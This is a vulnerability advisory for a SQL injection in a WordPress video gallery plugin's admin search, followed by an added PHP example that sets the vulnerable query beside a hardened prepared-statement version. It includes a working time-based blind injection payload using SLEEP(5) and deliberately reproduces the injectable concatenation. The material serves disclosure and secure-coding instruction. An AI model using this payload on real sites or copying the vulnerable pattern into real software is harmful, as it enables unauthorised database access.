Advisory ID: DC-2017-01-009
SQL injection
Vulnerable Function: $wpdb->get_var( $query );
Vulnerable Variable: $_POST['cat_search']
Vulnerable URL: http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery
Vulnerable Body: cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEEP(5)))DC)

The value of cat_search is passed through sanitize_text_field(), which strips tags and stray whitespace but does not escape SQL metacharacters, and is then concatenated unquoted into the WHERE clause (line 118) of the query executed by $wpdb->get_var() (line 128). The SLEEP(5) payload in the request body confirms the injection by delaying the response (time-based blind).

File: gallery-video\includes\admin\class-gallery-video-galleries.php
---------
107 $cat_id = sanitize_text_field( $_POST['cat_search'] );
...
118 $where .= " AND sl_width=" . $cat_id;
...
127 $query = "SELECT COUNT(*) FROM " . $wpdb->prefix . "huge_it_videogallery_galleries" . $where;
128 $total = $wpdb->get_var( $query );
---------
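The following is an added example, not code from the plugin or from the advisory. It places the vulnerable concatenation beside a hardened version that coerces the value to an integer and binds it through $wpdb->prepare(). It assumes the WordPress runtime is loaded ($wpdb, absint(), sanitize_text_field()); the table and column names come from the advisory, while the function names and the surrounding $where handling are hypothetical, since the excerpt does not show how $where is initialised.

```php
<?php
// Added example (not the plugin's code). Assumes WordPress is loaded so that
// $wpdb, absint() and sanitize_text_field() exist. Table and column names are
// taken from the advisory; function names and the $where prefix are hypothetical.

/**
 * Vulnerable pattern, kept for contrast. sanitize_text_field() removes tags,
 * line breaks and surplus whitespace but does not escape SQL, and the value is
 * concatenated unquoted into the WHERE clause, so a body such as
 * cat_search=1 AND (SELECT * FROM (SELECT(SLEEP(5)))DC) runs as SQL.
 */
function count_galleries_vulnerable( array $post ) {
	global $wpdb;
	$where = ' WHERE 1=1'; // hypothetical prefix; the excerpt only shows the .= append
	if ( isset( $post['cat_search'] ) && '' !== $post['cat_search'] ) {
		$cat_id = sanitize_text_field( $post['cat_search'] );
		$where .= ' AND sl_width=' . $cat_id; // attacker-controlled SQL fragment
	}
	$query = 'SELECT COUNT(*) FROM ' . $wpdb->prefix . 'huge_it_videogallery_galleries' . $where;
	return (int) $wpdb->get_var( $query );
}

/**
 * Hardened version. sl_width is compared against a number, so the input is
 * validated as a plain decimal integer, coerced with absint() and bound with a
 * %d placeholder in $wpdb->prepare(); the request value can no longer change
 * the structure of the statement. Returns null instead of running a query
 * when the parameter is missing or malformed.
 */
function count_galleries_safe( array $post ) {
	global $wpdb;
	if ( ! isset( $post['cat_search'] ) || '' === $post['cat_search'] ) {
		return null;
	}
	// Reject anything that is not digits only before it gets near SQL.
	if ( ! ctype_digit( (string) $post['cat_search'] ) ) {
		return null;
	}
	$cat_id = absint( $post['cat_search'] );
	$table  = $wpdb->prefix . 'huge_it_videogallery_galleries'; // not user controlled
	$query  = $wpdb->prepare(
		"SELECT COUNT(*) FROM {$table} WHERE sl_width = %d",
		$cat_id
	);
	return (int) $wpdb->get_var( $query );
}

// Usage in the admin page handler (hypothetical call site):
// $total = count_galleries_safe( $_POST );
```

The table name is interpolated directly because it is built from $wpdb->prefix and a constant, not from request data; only the request-derived value goes through the placeholder. Checking ctype_digit() before absint() matters because absint() would silently turn a payload such as "1 AND SLEEP(5)" into 1 and hide the attempt rather than rejecting it.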